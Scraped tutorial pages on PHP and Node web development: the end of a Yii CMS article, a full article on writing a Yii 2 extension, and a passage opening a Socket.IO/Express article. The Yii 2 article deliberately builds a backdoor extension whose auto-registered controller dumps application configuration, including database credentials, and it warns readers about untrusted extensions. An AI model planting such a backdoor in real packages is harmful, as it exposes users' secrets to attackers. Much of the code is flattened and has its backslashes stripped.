tries to access it from the non-slugged URI. We'll do this by creating a new method called beforeViewAction() that takes the entry ID as a parameter and gets called right after the actionView() method is called. This private method will simply check the URI from CHttpRequest to determine how actionView was accessed and return a 404 if it's not through our beautiful slugs: private function beforeViewAction($id=NULL){// If we do not have an ID, consider it to be null, and throw a 404errorif ($id == NULL)throw new CHttpException(404,'The specified post cannot befound.');// Retrieve the HTTP Request$r = new CHttpRequest();// Retrieve what the actual URI$requestUri = str_replace($r->baseUrl, '', $r->requestUri);// Retrieve the route$route = '/' . $this->getRoute() . '/' . $id;$requestUri = preg_replace('/?(.*)/','',$requestUri);// If the route and the uri are the same, then a direct accessattempt was made, and we need to block access to the controllerif ($requestUri == $route)throw new CHttpException(404, 'The requested post cannot befound.');return str_replace($r->baseUrl, '', $r->requestUri);} Then right after our actionView starts, we can simultaneously set the correct return URL and block access to the content if it wasn't accessed through the slug as follows: Yii::app()->user->setReturnUrl($this->beforeViewAction($id)); Adding comments to our CMS with Disqus Presently, our content is only informative in nature—we have no way for our users to communicate with us what they thought about our entry. To encourage engagement, we can add a commenting system to our CMS to further engage with our readers. Rather than writing our own commenting system, we can leverage comment through Disqus, a free, third-party commenting system. Even through Disqus, comments are implemented in JavaScript and we can create a custom widget wrapper for it to display comments on our site. The steps are as follows: To begin with, log in to the Disqus account you created at the beginning of this article as outlined in the prerequisites section. Then, navigate to http://disqus.com/admin/create/ and fill out the form fields as prompted and as shown in the following screenshot: Then, add a disqus section to your protected/config/params.php file with your site shortname: 'disqus' => array('shortname' => 'ch6disqusexample',) Next, create a new widget in protected/components called DisqusWidget.php. This widget will be loaded within our view and will be populated by our Content model: class DisqusWidget extends CWidget {} Begin by specifying the public properties that our view will be able to inject into as follows: public $shortname = NULL; public $identifier = NULL; public $url = NULL; public $title = NULL; Then, overload the init() method to load the Disqus JavaScript callback and to populate the JavaScript variables with those populated to the widget as follows:public function init() public function init(){parent::init();if ($this->shortname == NULL)throw new CHttpException(500, 'Disqus shortname isrequired');echo "<div id='disqus_thread'></div>";Yii::app()->clientScript->registerScript('disqus', "var disqus_shortname = '{$this->shortname}';var disqus_identifier = '{$this->identifier}';var disqus_url = '{$this->url}';var disqus_title = '{$this->title}';/* * * DON'T EDIT BELOW THIS LINE * * */(function() {var dsq = document.createElement('script'); dsq.type ='text/javascript'; dsq.async = true;dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);})();");} Finally, within our themes/main/views/content/view.php file, load the widget as follows: <?php $this->widget('DisqusWidget', array('shortname' => Yii::app()->params['includes']['disqus']['shortname'],'url' => $this->createAbsoluteUrl('/'.$post->slug),'title' => $post->title,'identifier' => $post->id)); ?> Now, when you load any given post, Disqus comments will also be loaded with that post. Go ahead and give it a try! Searching for content Next, we'll implement a search method so that our users can search for posts. To do this, we'll implement an instance of CActiveDataProvider and pass that data to our themes/main/views/content/all.php view to be rendered and paginated: public function actionSearch(){$param = Yii::app()->request->getParam('q');$criteria = new CDbCriteria;$criteria->addSearchCondition('title',$param,'OR');$criteria->addSearchCondition('body',$param,'OR');$dataprovider = new CActiveDataProvider('Content', array('criteria'=>$criteria,'pagination' => array('pageSize' => 5,'pageVar'=>'page')));$this->render('//content/all', array('dataprovider' => $dataprovider));} Since our view file already exists, we can now search for content in our CMS. Managing content Next, we'll implement a basic set of management tools that will allow us to create, update, and delete entries: We'll start by defining our loadModel() method and the actionDelete() method: private function loadModel($id=NULL){if ($id == NULL)throw new CHttpException(404, 'No category with that IDexists');$model = Content::model()->findByPk($id);if ($model == NULL)throw new CHttpException(404, 'No category with that IDexists');return $model;}public function actionDelete($id){$this->loadModel($id)->delete();$this->redirect($this->createUrl('content/admin'));} Next, we can implement our admin view, which will allow us to view all the content in our system and to create new entries. Be sure to copy the themes/main/views/content/admin.php file from the project resources folder into your project before using this view: public function actionAdmin(){$model = new Content('search');$model->unsetAttributes();if (isset($_GET['Content']))$model->attributes = $_GET;$this->render('admin', array('model' => $model));} Finally, we'll implement a save view to create and update entries. Saving content will simply pass it through our content model's validation rules. The only override we'll be adding is ensuring that the author is assigned to the user editing the entry. Before using this view, be sure to copy the themes/main/views/content/save.php file from the project resources folder into your project: public function actionSave($id=NULL){if ($id == NULL)$model = new Content;else$model = $this->loadModel($id);if (isset($_POST['Content'])){$model->attributes = $_POST['Content'];$model->author_id = Yii::app()->user->id;if ($model->save()){Yii::app()->user->setFlash('info', 'The articles wassaved');$this->redirect($this->createUrl('content/admin'));}}$this->render('save', array('model' => $model));} At this point, you can now log in to the system using the credentials provided in the following table and start managing entries: Username Password [email protected] test [email protected] test Summary In this article, we dug deeper into Yii framework by manipulating our CUrlManager class to generate completely dynamic and clean URIs. We also covered the use of Yii's built-in theming to dynamically change the frontend appearance of our site by simply changing a configuration value. Resources for Article: Further resources on this subject: Creating an Extension in Yii 2 [Article] Yii 1.1: Using Zii Components [Article] Agile with Yii 1.1 and PHP5: The TrackStar Application [Article]
Read more
  • 0
  • 0
  • 1735

article-image-creating-extension-yii-2
Packt
24 Sep 2014
22 min read
Save for later

Creating an Extension in Yii 2

Packt
24 Sep 2014
22 min read
In this article by Mark Safronov, co-author of the book Web Application Development with Yii 2 and PHP, we we'll learn to create our own extension using a simple way of installation. There is a process we have to follow, though some preparation will be needed to wire up your classes to the Yii application. The whole article will be devoted to this process. (For more resources related to this topic, see here.) Extension idea So, how are we going to extend the Yii 2 framework as an example for this article? Let's become vile this time and make a malicious extension, which will provide a sort of phishing backdoor for us. Never do exactly the thing we'll describe in this article! It'll not give you instant access to the attacked website anyway, but a skilled black hat hacker can easily get enough information to achieve total control over your application. The idea is this: our extension will provide a special route (a controller with a single action inside), which will dump the complete application configuration to the web page. Let's say it'll be reachable from the route /app-info/configuration. We cannot, however, just get the contents of the configuration file itself and that too reliably. At the point where we can attach ourselves to the application instance, the original configuration array is inaccessible, and even if it were accessible, we can't be sure about where it came from anyway. So, we'll inspect the runtime status of the application and return the most important pieces of information we can fetch at the stage of the controller action resolution. That's the exact payload we want to introduce. public function actionConfiguration()    {        $app = Yii::$app;        $config = [            'components' => $app->components,            'basePath' => $app->basePath,            'params' => $app->params,            'aliases' => Yii::$aliases        ];        return yiihelpersJson::encode($config);    } The preceding code is the core of the extension and is assumed in the following sections. In fact, if you know the value of the basePath setting of the application, a list of its aliases, settings for the components (among which the DB connection may reside), and all custom parameters that developers set manually, you can map the target application quite reliably. Given that you know all the credentials this way, you have an enormous amount of highly valuable information about the application now. All you need to do now is make the user install this extension. Creating the extension contents Our plan is as follows: We will develop our extension in a folder, which is different from our example CRM application. This extension will be named yii2-malicious, to be consistent with the naming of other Yii 2 extensions. Given the kind of payload we saw earlier, our extension will consist of a single controller and some special wiring code (which we haven't learned about yet) to automatically attach this controller to the application. Finally, to consider this subproject a true Yii 2 extension and not just some random library, we want it to be installable in the same way as other Yii 2 extensions. Preparing the boilerplate code for the extension Let's make a separate directory, initialize the Git repository there, and add the AppInfoController to it. In the bash command line, it can be achieved by the following commands: $ mkdir yii2-malicious && cd $_$ git init$ > AppInfoController.php Inside the AppInfoController.php file, we'll write the usual boilerplate code for the Yii 2 controller as follows: namespace malicious;use yiiwebController;class AppInfoController extends Controller{// Action here} Put the action defined in the preceding code snippet inside this controller and we're done with it. Note the namespace: it is not the same as the folder this controller is in, and this is not according to our usual auto-loading rules. We will explore later in this article that this is not an issue because of how Yii 2 treats the auto-loading of classes from extensions. Now this controller needs to be wired to the application somehow. We already know that the application has a special property called controllerMap, in which we can manually attach controller classes. However, how do we do this automatically, better yet, right at the application startup time? Yii 2 has a special feature called bootstrapping to support exactly this: to attach some activity at the beginning of the application lifetime, though not at the very beginning but before handling the request for sure. This feature is tightly related to the extensions concept in Yii 2, so it's a perfect time to explain it. FEATURE – bootstrapping To explain the bootstrapping concept in short, you can declare some components of the application in the yiibaseApplication::$bootstrap property. They'll be properly instantiated at the start of the application. If any of these components implement the BootstrapInterface interface, its bootstrap() method will be called, so you'll get the application initialization enhancement for free. Let's elaborate on this. The yiibaseApplication::$bootstrap property holds the array of generic values that you tell the framework to initialize beforehand. It's basically an improvement over the preload concept from Yii 1.x. You can specify four kinds of values to initialize as follows: The ID of an application component The ID of some module A class name A configuration array If it's the ID of a component, this component is fully initialized. If it's the ID of a module, this module is fully initialized. It matters greatly because Yii 2 has lazy loading employed on the components and modules system, and they are usually initialized only when explicitly referenced. Being bootstrapped means to them that their initialization, regardless of whether it's slow or resource-consuming, always happens, and happens always at the start of the application. If you have a component and a module with identical IDs, then the component will be initialized and the module will not be initialized! If the value being mentioned in the bootstrap property is a class name or configuration array, then the instance of the class in question is created using the yiiBaseYii::createObject() facility. The instance created will be thrown away immediately if it doesn't implement the yiibaseBootstrapInterface interface. If it does, its bootstrap() method will be called. Then, the object will be thrown away. So, what's the effect of this bootstrapping feature? We already used this feature while installing the debug extension. We had to bootstrap the debug module using its ID, for it to be able to attach the event handler so that we would get the debug toolbar at the bottom of each page of our web application. This feature is indispensable if you need to be sure that some activity will always take place at the start of the application lifetime. The BootstrapInterface interface is basically the incarnation of a command pattern. By implementing this interface, we gain the ability to attach any activity, not necessarily bound to the component or module, to the application initialization. FEATURE – extension registering The bootstrapping feature is repeated in the handling of the yiibaseApplication::$extensions property. This property is the only place where the concept of extension can be seen in the Yii framework. Extensions in this property are described as a list of arrays, and each of them should have the following fields: name: This field will be with the name of the extension. version: This field will be with the extension's version (nothing will really check it, so it's only for reference). bootstrap: This field will be with the data for this extension's Bootstrap. This field is filled with the same elements as that of Yii::$app->bootstrap described previously and has the same semantics. alias: This field will be with the mapping from Yii 2 path aliases to real directory paths. When the application registers the extension, it does two things in the following order: It registers the aliases from the extension, using the Yii::setAlias() method. It initializes the thing mentioned in the bootstrap of the extension in exactly the same way we described in the previous section. Note that the extensions' bootstraps are processed before the application's bootstraps. Registering aliases is crucial to the whole concept of extension in Yii 2. It's because of the Yii 2 PSR-4 compatible autoloader. Here is the quote from the documentation block for the yiiBaseYii::autoload() method: If the class is namespaced (e.g. yiibaseComponent), it will attempt to include the file associated with the corresponding path alias (e.g. @yii/base/Component.php). This autoloader allows loading classes that follow the PSR-4 standard and have its top-level namespace or sub-namespaces defined as path aliases. The PSR-4 standard is available online at http://www.php-fig.org/psr/psr-4/. Given that behavior, the alias setting of the extension is basically a way to tell the autoloader the name of the top-level namespace of the classes in your extension code base. Let's say you have the following value of the alias setting of your extension: "alias" => ["@companyname/extensionname" => "/some/absolute/path"] If you have the /some/absolute/path/subdirectory/ClassName.php file, and, according to PSR-4 rules, it contains the class whose fully qualified name is companynameextensionnamesubdirectoryClassName, Yii 2 will be able to autoload this class without problems. Making the bootstrap for our extension – hideous attachment of a controller We have a controller already prepared in our extension. Now we want this controller to be automatically attached to the application under attack when the extension is processed. This is achievable using the bootstrapping feature we just learned. Let's create the maliciousBootstrap class for this cause inside the code base of our extension, with the following boilerplate code: <?phpnamespace malicious;use yiibaseBootstrapInterface;class Bootstrap implements BootstrapInterface{/** @param yiiwebApplication $app */public function bootstrap($app){// Controller addition will be here.}} With this preparation, the bootstrap() method will be called at the start of the application, provided we wire everything up correctly. But first, we should consider how we manipulate the application to make use of our controller. This is easy, really, because there's the yiiwebApplication::$controllerMap property (don't forget that it's inherited from yiibaseModule, though). We'll just do the following inside the bootstrap() method: $app->controllerMap['app-info'] = 'maliciousAppInfoController'; We will rely on the composer and Yii 2 autoloaders to actually find maliciousAppInfoController. Just imagine that you can do anything inside the bootstrap. For example, you can open the CURL connection with some botnet and send the accumulated application information there. Never believe random extensions on the Web. This actually concludes what we need to do to complete our extension. All that's left now is to make our extension installable in the same way as other Yii 2 extensions we were using up until now. If you need to attach this malicious extension to your application manually, and you have a folder that holds the code base of the extension at the path /some/filesystem/path, then all you need to do is to write the following code inside the application configuration:  'extensions' => array_merge((require __DIR__ . '/../vendor/yiisoft/extensions.php'),['maliciousapp-info' => ['name' => 'Application Information Dumper','version' => '1.0.0','bootstrap' => 'maliciousBootstrap','alias' => ['@malicious' =>'/some/filesystem/path']// that's the path to extension]]) Please note the exact way of specifying the extensions setting. We're merging the contents of the extensions.php file supplied by the Yii 2 distribution from composer and our own manual definition of the extension. This extensions.php file is what allows Yiisoft to distribute the extensions in such a way that you are able to install them by a simple, single invocation of a require composer command. Let's learn now what we need to do to repeat this feature. Making the extension installable as... erm, extension First, to make it clear, we are talking here only about the situation when Yii 2 is installed by composer, and we want our extension to be installable through the composer as well. This gives us the baseline under all of our assumptions. Let's see the extensions that we need to install: Gii the code generator The Twitter Bootstrap extension The Debug extension The SwiftMailer extension We can install all of these extensions using composer. We introduce the extensions.php file reference when we install the Gii extension. Have a look at the following code: 'extensions' => (require __DIR__ . '/../vendor/yiisoft/extensions.php') If we open the vendor/yiisoft/extensions.php file (given that all extensions from the preceding list were installed) and look at its contents, we'll see the following code (note that in your installation, it can be different): <?php $vendorDir = dirname(__DIR__); return array ( 'yiisoft/yii2-bootstrap' => array ( 'name' => 'yiisoft/yii2-bootstrap', 'version' => '9999999-dev', 'alias' => array ( '@yii/bootstrap' => $vendorDir . '/yiisoft/yii2-bootstrap', ), ), 'yiisoft/yii2-swiftmailer' => array ( 'name' => 'yiisoft/yii2-swiftmailer', 'version' => '9999999-dev', 'alias' => array ( '@yii/swiftmailer' => $vendorDir . ' /yiisoft/yii2-swiftmailer', ), ), 'yiisoft/yii2-debug' => array ( 'name' => 'yiisoft/yii2-debug', 'version' => '9999999-dev', 'alias' => array ( '@yii/debug' => $vendorDir . '/yiisoft/yii2-debug', ), ), 'yiisoft/yii2-gii' => array ( 'name' => 'yiisoft/yii2-gii', 'version' => '9999999-dev', 'alias' => array ( '@yii/gii' => $vendorDir . '/yiisoft/yii2-gii', ), ), ); One extension was highlighted to stand out from the others. So, what does all this mean to us? First, it means that Yii 2 somehow generates the required configuration snippet automatically when you install the extension's composer package Second, it means that each extension provided by the Yii 2 framework distribution will ultimately be registered in the extensions setting of the application Third, all the classes in the extensions are made available in the main application code base by the carefully crafted alias settings inside the extension configuration Fourth, ultimately, easy installation of Yii 2 extensions is made possible by some integration between the Yii framework and the composer distribution system The magic is hidden inside the composer.json manifest of the extensions built into Yii 2. The details about the structure of this manifest are written in the documentation of composer, which is available at https://getcomposer.org/doc/04-schema.md. We'll need only one field, though, and that is type. Yii 2 employs a special type of composer package, named yii2-extension. If you check the manifests of yii2-debug, yii2-swiftmail and other extensions, you'll see that they all have the following line inside: "type": "yii2-extension", Normally composer will not understand that this type of package is to be installed. But the main yii2 package, containing the framework itself, depends on the special auxiliary yii2-composer package: "require": {… other requirements ..."yiisoft/yii2-composer": "*", This package provides Composer Custom Installer (read about it at https://getcomposer.org/doc/articles/custom-installers.md), which enables this package type. The whole point in the yii2-extension package type is to automatically update the extensions.php file with the information from the extension's manifest file. Basically, all we need to do now is to craft the correct composer.json manifest file inside the extension's code base. Let's write it step by step. Preparing the correct composer.json manifest We first need a block with an identity. Have a look at the following lines of code: "name": "malicious/app-info","version": "1.0.0","description": "Example extension which reveals importantinformation about the application","keywords": ["yii2", "application-info", "example-extension"],"license": "CC-0", Technically, we must provide only name. Even version can be omitted if our package meets two prerequisites: It is distributed from some version control system repository, such as the Git repository It has tags in this repository, correctly identifying the versions in the commit history And we do not want to bother with it right now. Next, we need to depend on the Yii 2 framework just in case. Normally, users will install the extension after the framework is already in place, but in the case of the extension already being listed in the require section of composer.json, among other things, we cannot be sure about the exact ordering of the require statements, so it's better (and easier) to just declare dependency explicitly as follows: "require": {"yiisoft/yii2": "*"}, Then, we must provide the type as follows: "type": "yii2-extension", After this, for the Yii 2 extension installer, we have to provide two additional blocks; autoload will be used to correctly fill the alias section of the extension configuration. Have a look at the following code: "autoload": {"psr-4": {"malicious\": ""}}, What we basically mean is that our classes are laid out according to PSR-4 rules in such a way that the classes in the malicious namespace are placed right inside the root folder. The second block is extra, in which we tell the installer that we want to declare a bootstrap section for the extension configuration: "extra": {"bootstrap": "malicious\Bootstrap"}, Our manifest file is complete now. Commit everything to the version control system: $ git commit -a -m "Added the Composer manifest file to repo" Now, we'll add the tag at last, corresponding to the version we declared as follows: $ git tag 1.0.0 We already mentioned earlier the purpose for which we're doing this. All that's left is to tell the composer from where to fetch the extension contents. Configuring the repositories We need to configure some kind of repository for the extension now so that it is installable. The easiest way is to use the Packagist service, available at https://packagist.org/, which has seamless integration with composer. It has the following pro and con: Pro: You don't need to declare anything additional in the composer.json file of the application you want to attach the extension to Con: You must have a public VCS repository (either Git, SVN, or Mercurial) where your extension is published In our case, where we are just in fact learning about how to install things using composer, we certainly do not want to make our extension public. Do not use Packagist for the extension example we are building in this article. Let's recall our goal. Our goal is to be able to install our extension by calling the following command at the root of the code base of some Yii 2 application: $ php composer.phar require "malicious/app-info:*" After that, we should see something like the following screenshot after requesting the /app-info/configuration route: This corresponds to the following structure (the screenshot is from the http://jsonviewer.stack.hu/ web service): Put the extension to some public repository, for example, GitHub, and register a package at Packagist. This command will then work without any preparation in the composer.json manifest file of the target application. But in our case, we will not make this extension public, and so we have two options left for us. The first option, which is perfectly suited to our learning cause, is to use the archived package directly. For this, you have to add the repositories section to composer.json in the code base of the application you want to add the extension to: "repositories": [// definitions of repositories for the packages required by thisapplication] To specify the repository for the package that should be installed from the ZIP archive, you have to grab the entire contents of the composer.json manifest file of this package (in our case, our malicious/app-info extension) and put them as an element of the repositories section, verbatim. This is the most complex way to set up the composer package requirement, but this way, you can depend on absolutely any folder with files (packaged into an archive). Of course, the contents of composer.json of the extension do not specify the actual location of the extension's files. You have to add this to repositories manually. In the end, you should have the following additional section inside the composer.json manifest file of the target application: "repositories": [{"type": "package","package": {// … skipping whatever were copied verbatim from the composer.jsonof extension..."dist": {"url": "/home/vagrant/malicious.zip", // example filelocation"type": "zip"}}}] This way, we specify the location of the package in the filesystem of the same machine and tell the composer that this package is a ZIP archive. Now, you should just zip the contents of the yii2-malicious folder we have created for the extension, put them somewhere at the target machine, and provide the correct URL. Please note that it's necessary to archive only the contents of the extension and not the folder itself. After this, you run composer on the machine that really has this URL accessible (you can use http:// type of URLs, of course, too), and then you get the following response from composer: To check that Yii 2 really installed the extension, you can open the file vendor/yiisoft/extensions.php and check whether it contains the following block now: 'malicious/app-info' =>array ('name' => 'malicious/app-info','version' => '1.0.0.0','alias' =>array ('@malicious' => $vendorDir . '/malicious/app-info',),'bootstrap' => 'malicious\Bootstrap',), (The indentation was preserved as is from the actual file.) If this block is indeed there, then all you need to do is open the /app-info/configuration route and see whether it reports JSON to you. It should. The pros and cons of the file-based installation are as follows: Pros Cons You can specify any file as long as it is reachable by some URL. The ZIP archive management capabilities exist on virtually any kind of platform today. There is too much work in the composer.json manifest file of the target application. The requirement to copy the entire manifest to the repositories section is overwhelming and leads to code duplication. You don't need to set up any version control system repository. It's of dubious benefit though. The manifest from the extension package will not be processed at all. This means that you cannot just strip the entry in repositories, leaving only the dist and name sections there, because the Yii 2 installer will not be able to get to the autoloader and extra sections. The last method is to use the local version control system repository. We already have everything committed to the Git repository, and we have the correct tag placed here, corresponding to the version we declared in the manifest. This is everything we need to prepare inside the extension itself. Now, we need to modify the target application's manifest to add the repositories section in the same way we did previously, but this time we will introduce a lot less code there: "repositories": [{"type": "git","url": "/home/vagrant/yii2-malicious/" // put your own URLhere}] All that's needed from you is to specify the correct URL to the Git repository of the extension we were preparing at the beginning of this article. After you specify this repository in the target application's composer manifest, you can just issue the desired command: $ php composer.phar require "malicious/app-info:1.0.0" Everything will be installed as usual. Confirm the successful installation again by having a look at the contents of vendor/yiisoft/extensions.php and by accessing the /app-info/configuration route in the application. The pros and con of the repository-based installation are as follows: Pro: Relatively little code to write in the application's manifest. Pro: You don't need to really publish your extension (or the package in general). In some settings, it's really useful, for closed-source software, for example. Con: You still have to meddle with the manifest of the application itself, which can be out of your control and in this case, you'll have to guide your users about how to install your extension, which is not good for PR. In short, the following pieces inside the composer.json manifest turn the arbitrary composer package into the Yii 2 extension: First, we tell composer to use the special Yii 2 installer for packages as follows: "type": "yii2-extension" Then, we tell the Yii 2 extension installer where the bootstrap for the extension (if any) is as follows: "extra": {"bootstrap": "<Fully qualified name>"} Next, we tell the Yii 2 extension installer how to prepare aliases for your extension so that classes can be autoloaded as follows: "autoloader": {"psr-4": { "namespace": "<folder path>"}} Finally, we add the explicit requirement of the Yii 2 framework itself in the following code, so we'll be sure that the Yii 2 extension installer will be installed at all: "require": {"yiisoft/yii2": "*"} Everything else is the details of the installation of any other composer package, which you can read in the official composer documentation. Summary In this article, we looked at how Yii 2 implements its extensions so that they're easily installable by a single composer invocation and can be automatically attached to the application afterwards. We learned that this required some level of integration between these two systems, Yii 2 and composer, and in turn this requires some additional preparation from you as a developer of the extension. We used a really silly, even a bit dangerous, example for extension. It was for three reasons: The extension was fun to make (we hope) We showed that using bootstrap mechanics, we can basically automatically wire up the pieces of the extension to the target application without any need for elaborate manual installation instructions We showed the potential danger in installing random extensions from the Web, as an extension can run absolutely arbitrary code right at the application initialization and more than that, at each request made to the application We have discussed three methods of distribution of composer packages, which also apply to the Yii 2 extensions. The general rule of thumb is this: if you want your extension to be publicly available, just use the Packagist service. In any other case, use the local repositories, as you can use both local filesystem paths and web URLs. We looked at the option to attach the extension completely manually, not using the composer installation at all. Resources for Article: Further resources on this subject: Yii: Adding Users and User Management to Your Site [Article] Meet Yii [Article] Yii 1.1: Using Zii Components [Article]
Read more
  • 0
  • 0
  • 5083

article-image-using-socketio-and-express-together
Packt
23 Sep 2014
16 min read
Save for later

Using Socket.IO and Express together

Packt
23 Sep 2014
16 min read
In this article by Joshua Johanan, the author of the book Building Scalable Apps with Redis and Node.js, tells us that Express application is just the foundation. We are going to add features until it is a fully usable app. We currently can serve web pages and respond to HTTP, but now we want to add real-time communication. It's very fortunate that we just spent most of this article learning about Socket.IO; it does just that! Let's see how we are going to integrate Socket.IO with an Express application. (For more resources related to this topic, see here.) We are going to use Express and Socket.IO side by side. Socket.IO does not use HTTP like a web application. It is event based, not request based. This means that Socket.IO will not interfere with Express routes that we have set up, and that's a good thing. The bad thing is that we will not have access to all the middleware that we set up for Express in Socket.IO. There are some frameworks that combine these two, but it still has to convert the request from Express into something that Socket.IO can use. I am not trying to knock down these frameworks. They simplify a complex problem and most importantly, they do it well (Sails is a great example of this). Our app, though, is going to keep Socket.IO and Express separated as much as possible with the least number of dependencies. We know that Socket.IO does not need Express, as all our examples have not used Express in any way. This has an added benefit in that we can break off our Socket.IO module and run it as its own application at a future point in time. The other great benefit is that we learn how to do it ourselves. We need to go into the directory where our Express application is. Make sure that our pacakage.json has all the additional packages for this article and run npm.install. The first thing we need to do is add our configuration settings. Adding Socket.IO to the config We will use the same config file that we created for our Express app. Open up config.js and change the file to what I have done in the following code: var config = {port: 3000,secret: 'secret',redisPort: 6379,redisHost: 'localhost',routes: {   login: '/account/login',   logout: '/account/logout'}};module.exports = config; We are adding two new attributes, redisPort and redisHost. This is because of how the redis package configures its clients. We also are removing the redisUrl attribute. We can configure all our clients with just these two Redis config options. Next, create a directory under the root of our project named socket.io. Then, create a file called index.js. This will be where we initialize Socket.IO and wire up all our event listeners and emitters. We are just going to use one namespace for our application. If we were to add multiple namespaces, I would just add them as files underneath the socket.io directory. Open up app.js and change the following lines in it: //variable declarations at the topVar io = require('./socket.io');//after all the middleware and routesvar server = app.listen(config.port);io.startIo(server); We will define the startIo function shortly, but let's talk about our app.listen change. Previously, we had the app.listen execute, and we did not capture it in a variable; now we are. Socket.IO listens using Node's http.createServer. It does this automatically if you pass in a number into its listen function. When Express executes app.listen, it returns an instance of the HTTP server. We capture that, and now we can pass the http server to Socket.IO's listen function. Let's create that startIo function. Open up index.js present in the socket.io location and add the following lines of code to it: var io = require('socket.io');var config = require('../config');var socketConnection = function socketConnection(socket){socket.emit('message', {message: 'Hey!'});};exports.startIo = function startIo(server){io = io.listen(server);var packtchat = io.of('/packtchat');packtchat.on('connection', socketConnection);return io;}; We are exporting the startIo function that expects a server object that goes right into Socket.IO's listen function. This should start Socket.IO serving. Next, we get a reference to our namespace and listen on the connection event, sending a message event back to the client. We also are loading our configuration settings. Let's add some code to the layout and see whether our application has real-time communication. We will need the Socket.IO client library, so link to it from node_modules like you have been doing, and put it in our static directory under a newly created js directory. Open layout.ejs present in the packtchatviews location and add the following lines to it: <!-- put these right before the body end tag --><script type="text/javascript" src="/js/socket.io.js"></script><script>var socket = io.connect("http://localhost:3000/packtchat");socket.on('message', function(d){console.log(d);});</script> We just listen for a message event and log it to the console. Fire up the node and load your application, http://localhost:3000. Check to see whether you get a message in your console. You should see your message logged to the console, as seen in the following screenshot: Success! Our application now has real-time communication. We are not done though. We still have to wire up all the events for our app. Who are you? There is one glaring issue. How do we know who is making the requests? Express has middleware that parses the session to see if someone has logged in. Socket.IO does not even know about a session. Socket.IO lets anyone connect that knows the URL. We do not want anonymous connections that can listen to all our events and send events to the server. We only want authenticated users to be able to create a WebSocket. We need to get Socket.IO access to our sessions. Authorization in Socket.IO We haven't discussed it yet, but Socket.IO has middleware. Before the connection event gets fired, we can execute a function and either allow the connection or deny it. This is exactly what we need. Using the authorization handler Authorization can happen at two places, on the default namespace or on a named namespace connection. Both authorizations happen through the handshake. The function's signature is the same either way. It will pass in the socket server, which has some stuff we need such as the connection's headers, for example. For now, we will add a simple authorization function to see how it works with Socket.IO. Open up index.js, present at the packtchatsocket.io location, and add a new function that will sit next to the socketConnection function, as seen in the following code: var io = require('socket.io');var socketAuth = function socketAuth(socket, next){return next();return next(new Error('Nothing Defined'));};var socketConnection = function socketConnection(socket){socket.emit('message', {message: 'Hey!'});};exports.startIo = function startIo(server){io = io.listen(server);var packtchat = io.of('/packtchat');packtchat.use(socketAuth);packtchat.on('connection', socketConnection);return io;}; I know that there are two returns in this function. We are going to comment one out, load the site, and then switch the lines that are commented out. The socket server that is passed in will have a reference to the handshake data that we will use shortly. The next function works just like it does in Express. If we execute it without anything, the middleware chain will continue. If it is executed with an error, it will stop the chain. Let's load up our site and test both by switching which return gets executed. We can allow or deny connections as we please now, but how do we know who is trying to connect? Cookies and sessions We will do it the same way Express does. We will look at the cookies that are passed and see if there is a session. If there is a session, then we will load it up and see what is in it. At this point, we should have the same knowledge about the Socket.IO connection that Express does about a request. The first thing we need to do is get a cookie parser. We will use a very aptly named package called cookie. This should already be installed if you updated your package.json and installed all the packages. Add a reference to this at the top of index.js present in the packtchatsocket.io location with all the other variable declarations: Var cookie = require('cookie'); And now we can parse our cookies. Socket.IO passes in the cookie with the socket object in our middleware. Here is how we parse it. Add the following code in the socketAuth function: var handshakeData = socket.request;var parsedCookie = cookie.parse(handshakeData.headers.cookie); At this point, we will have an object that has our connect.sid in it. Remember that this is a signed value. We cannot use it as it is right now to get the session ID. We will need to parse this signed cookie. This is where cookie-parser comes in. We will now create a reference to it, as follows: var cookieParser = require('cookie-parser'); We can now parse the signed connect.sid cookie to get our session ID. Add the following code right after our parsing code: var sid = cookieParser.signedCookie (parsedCookie['connect.sid'], config.secret); This will take the value from our parsedCookie and using our secret passphrase, will return the unsigned value. We will do a quick check to make sure this was a valid signed cookie by comparing the unsigned value to the original. We will do this in the following way: if (parsedCookie['connect.sid'] === sid)   return next(new Error('Not Authenticated')); This check will make sure we are only using valid signed session IDs. The following screenshot will show you the values of an example Socket.IO authorization with a cookie: Getting the session We now have a session ID so we can query Redis and get the session out. The default session store object of Express is extended by connect-redis. To use connect-redis, we use the same session package as we did with Express, express-session. The following code is used to create all this in index.js, present at packtchatsocket.io: //at the top with the other variable declarationsvar expressSession = require('express-session');var ConnectRedis = require('connect-redis')(expressSession);var redisSession = new ConnectRedis({host: config.redisHost, port: config.redisPort}); The final line is creating the object that will connect to Redis and get our session. This is the same command used with Express when setting the store option for the session. We can now get the session from Redis and see what's inside of it. What follows is the entire socketAuth function along with all our variable declarations: var io = require('socket.io'),connect = require('connect'),cookie = require('cookie'),expressSession = require('express-session'),ConnectRedis = require('connect-redis')(expressSession),redis = require('redis'),config = require('../config'),redisSession = new ConnectRedis({host: config.redisHost, port: config.redisPort});var socketAuth = function socketAuth(socket, next){var handshakeData = socket.request;var parsedCookie = cookie.parse(handshakeData.headers.cookie);var sid = connect.utils.parseSignedCookie(parsedCookie['connect.sid'], config.secret);if (parsedCookie['connect.sid'] === sid) return next(new Error('Not Authenticated'));redisSession.get(sid, function(err, session){   if (session.isAuthenticated)   {     socket.user = session.user;     socket.sid = sid;     return next();   }   else     return next(new Error('Not Authenticated'));});}; We can use redisSession and sid to get the session out of Redis and check its attributes. As far as our packages are concerned, we are just another Express app getting session data. Once we have the session data, we check the isAuthenticated attribute. If it's true, we know the user is logged in. If not, we do not let them connect yet. We are adding properties to the socket object to store information from the session. Later on, after a connection is made, we can get this information. As an example, we are going to change our socketConnection function to send the user object to the client. The following should be our socketConnection function: var socketConnection = function socketConnection(socket){socket.emit('message', {message: 'Hey!'});socket.emit('message', socket.user);}; Now, let's load up our browser and go to http://localhost:3000. Log in and then check the browser's console. The following screenshot will show that the client is receiving the messages: Adding application-specific events The next thing to do is to build out all the real-time events that Socket.IO is going to listen for and respond to. We are just going to create the skeleton for each of these listeners. Open up index.js, present in packtchatsocket.io, and change the entire socketConnection function to the following code: var socketConnection = function socketConnection(socket){socket.on('GetMe', function(){});socket.on('GetUser', function(room){});socket.on('GetChat', function(data){});socket.on('AddChat', function(chat){});socket.on('GetRoom', function(){});socket.on('AddRoom', function(r){});socket.on('disconnect', function(){});}; Most of our emit events will happen in response to a listener. Using Redis as the store for Socket.IO The final thing we are going to add is to switch Socket.IO's internal store to Redis. By default, Socket.IO uses a memory store to save any data you attach to a socket. As we know now, we cannot have an application state that is stored only on one server. We need to store it in Redis. Therefore, we add it to 